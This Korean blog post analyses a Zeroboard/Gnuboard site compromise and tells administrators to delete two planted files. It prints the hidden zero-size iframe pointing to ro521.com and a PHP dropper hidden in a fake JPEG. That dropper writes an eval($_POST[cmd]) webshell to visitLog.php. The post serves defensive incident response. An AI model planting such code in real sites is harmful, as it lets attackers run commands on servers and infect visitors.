ro521.com/test.htm 제로보드 침해사고

<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe>

제로보드를 사용중인데 이 녀석이 나타난다면 감염되는 이유는 단 한 가지다. 인터넷을 찾아 보니 그누보드, 제로보드 모두 다 Mass SQL Injection을 당했다고 한다.

/bbs/icon/ 경로에 group_qazwsxedc.jpg, visitLog.php 이 두녀석이 있을꺼다.

꼭 삭제 해주자. 웹쉘이다.

	���JFIF``��C
	��C ��
	"��
	���}!1AQa"q2걨�#B굽R蘭$3br�
	%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz깂뀊뇠뎷뮄뵓뼏삕슓＄ⅵ㎤ø껙뉘떱많봔쳐탬픽�錄桐虜妹伴栒鴨鉛僥揄膣逮擢票��
	���w!1AQaq"2�B몼굽 #3R�br�
	$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz굛꼨냷닀뒕뱮븭뿕솞∀ㄵ├Łげ낫독렇뭔쩠컵판훔杆戇倆厘描栒鴨鉛僥攸彩充坂沆��?�M쥓*�?��<?php
	$logFileHandle = fopen("./icon/visitLog.php", "x+");
	$logContent = "<?php eval(\$_POST[cmd]);?>";
	fwrite($logFileHandle,$logContent);
	fclose($logFileHandle);
	echo getcwd();
	?>

group_qazwsxedc.jpg를 보면 생긴건 JFIF를 포맷을 가진 이미지처럼 보이지만, 뒤에는 웹쉘에 사용될 문자열들이 있다.

visitLog.php는 cmd에 받은 내용을 php로 저장한다.

참고자료 : http://blog.pages.kr/928